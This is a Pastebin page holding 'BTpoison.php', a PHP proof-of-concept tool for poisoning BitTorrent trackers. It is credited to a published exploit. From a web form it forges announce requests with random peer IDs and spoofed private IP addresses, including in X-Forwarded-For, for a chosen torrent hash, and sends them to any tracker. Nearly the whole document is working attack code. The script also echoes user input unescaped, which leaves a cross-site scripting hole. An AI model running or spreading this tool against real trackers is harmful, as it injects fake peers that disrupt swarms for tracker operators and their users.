Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!--
- This script is creating a random peer on a tracker for a specific torrent, based on the announce URL and the torrent's hash.
- It is mostly inspired by the C# script from Burningmace : http://packetstormsecurity.org/0911-exploits/torrent-poisoning.txt
- Currently, only ONE request is sent to the tracker and only private IPs are used. It is enough for the proof of concept.
- Use it wisely, youg padawan.
- -->
- <HTML>
- <HEAD>
- <TITLE>BTpoison.php</TITLE>
- <STYLE TYPE="text/css">
- <!--
- BODY, TD, TH {
- font-family: Verdana;
- font-size: 11px;
- color: #867C68;
- }
- A {
- text-decoration: none;
- }
- A:HOVER {
- color: #FF0000;
- text-decoration: underline;
- }
- #warning {
- background-color: #CC0000;
- color: #FFFFFF;
- padding: 5px;
- margin: 20px 0px 20px 0px;
- width: 600px;
- }
- #log {
- background-color: #000000;
- color: #FFFFFF;
- padding: 5px;
- margin: 20px 0px 20px 0px;
- width: 600px;
- }
- PRE {
- color: yellow;
- white-space: pre-wrap; /* CSS-3 */
- white-space: -moz-pre-wrap; /* Mozilla, since 1999 */
- white-space: -pre-wrap; /* Opera 4-6 */
- white-space: -o-pre-wrap; /* Opera 7 */
- word-wrap: break-word; /* Internet Explorer 5.5+ */
- }
- -->
- </STYLE>
- </HEAD>
- <BODY TEXT="#867C68" LINK="#800000" ALINK="#800000" VLINK="#800000">
- <h3>BTpoison.php</h3><h5>version : 0.070</h5>
- <?php
- $run = $_GET['run'];
- $announceurl = $_GET['announceurl'];
- $hash = $_GET['hash'];
- //if (isset($run) && $run == 'Run') {
- if (isset($announceurl) && isset($hash)) {
- if ($announceurl == '' || $hash == '') { echo "<div id=\"warning\">You MUST feed me with both URL and hash !</div>"; } else {
- // ============================ START ============================
- echo "<div id=\"log\">";
- // gathering stuff
- $parsedurl = parse_url($announceurl);
- $host = $parsedurl[host] ;
- if (isset($parsedurl[port])) { $hostport = $parsedurl[port] ; } else { $hostport = 80 ; }
- $hostpath = $parsedurl[path] ;
- $tmphash = str_split($hash, 2);
- $encodedhash = '%'.implode("%", $tmphash); ;
- $clientid = '-UT1800-'.rand(10,99).rand(10000,99999).rand(10000,99999) ; // UT, AZ, TR...
- $left = 0 ; // bytes left (0 to seed)
- $event = "completed" ; // or started
- $port = rand(42000,42999) ;
- $nfetch = 5 ; // numwant
- $ipaddress = '192.168.'.rand(0,255).'.'.rand(0,255) ;
- $uagent = "uTorrent/1800(18488)" ;
- echo "announce URL : $announceurl<br>" ;
- echo "host : $host<br><br>" ;
- echo "hash : $hash<br>" ;
- echo "encodedhash : $encodedhash<br><br>" ;
- echo "random peer id : $clientid<br>" ;
- echo "random peer ip : $ipaddress<br><br>" ;
- $request = $announceurl.'?info_hash='.$encodedhash.'&peer_id='.$clientid.'&uploaded=0&downloaded=0&left='.$left.'&event='.$event.'&port='.$port.'&numwant='.$nfetch.'&ip='.$ipaddress.'&compact=1' ;
- echo "BT request : ".$request."<br><br>--------------------<br><br>" ;
- // cooking request
- $envoi = "GET $request HTTP/1.0\r\n\r\n";
- $envoi .= "Host: $host\r\n";
- $envoi .= "X-Forwarded-For: $ipaddress\r\n";
- $envoi .= "User-Agent: $uagent\r\n";
- $envoi .= "Content-type: text/html\r\n";
- $envoi .= "Connection: Close\r\n\r\n";
- $longueur = strlen($envoi) ;
- echo "HTTP request : <pre>$envoi</pre>";
- echo "request lenth : $longueur<br><br>--------------------<br><br>";
- // sending request
- $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
- if($socket < 0){ die('FATAL ERROR: socket_create() : " '.socket_strerror($socket).' "'); }
- else { echo "creating socket...<br>"; }
- if (socket_connect($socket,gethostbyname($host),$hostport) < 0){ die('FATAL ERROR: socket_connect()'); }
- else { echo "connecting socket...<br>"; }
- if(($int = socket_write($socket, $envoi, strlen($envoi))) === false){ die('FATAL ERROR: socket_write() failed, '.$int.' characters written'); }
- else { echo "sending HTTP request...<br><br>"; }
- // reading answer
- $reception = '';
- while($buff = socket_read($socket, 3000)){ $reception.=$buff; }
- echo 'server says : <pre>'.$reception."</pre>--------------------<br>";
- socket_close($socket);
- echo "</div>"; //log
- // ============================ END ============================
- } // else
- } // if isset
- ?>
- <form method="get" action="btpoison.php" enctype="multipart/form-data">
- <fieldset style="width: 600px;">
- <legend>torrent data</legend>
- <p><label for="announceurl">announce URL : </label><input type="text" name="announceurl" /><small> » http://tracker.domaine.ext/announce.php</small></p>
- <p><label for="hash">hash : </label><input type="text" name="hash" /><small> » 43c10318709c06f7ef7d6b4d26673378103203a3</small></p>
- <p><input type="submit" name="run" value="Run" /></p>
- </fieldset>
- </form>
- </BODY>
- </HTML>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement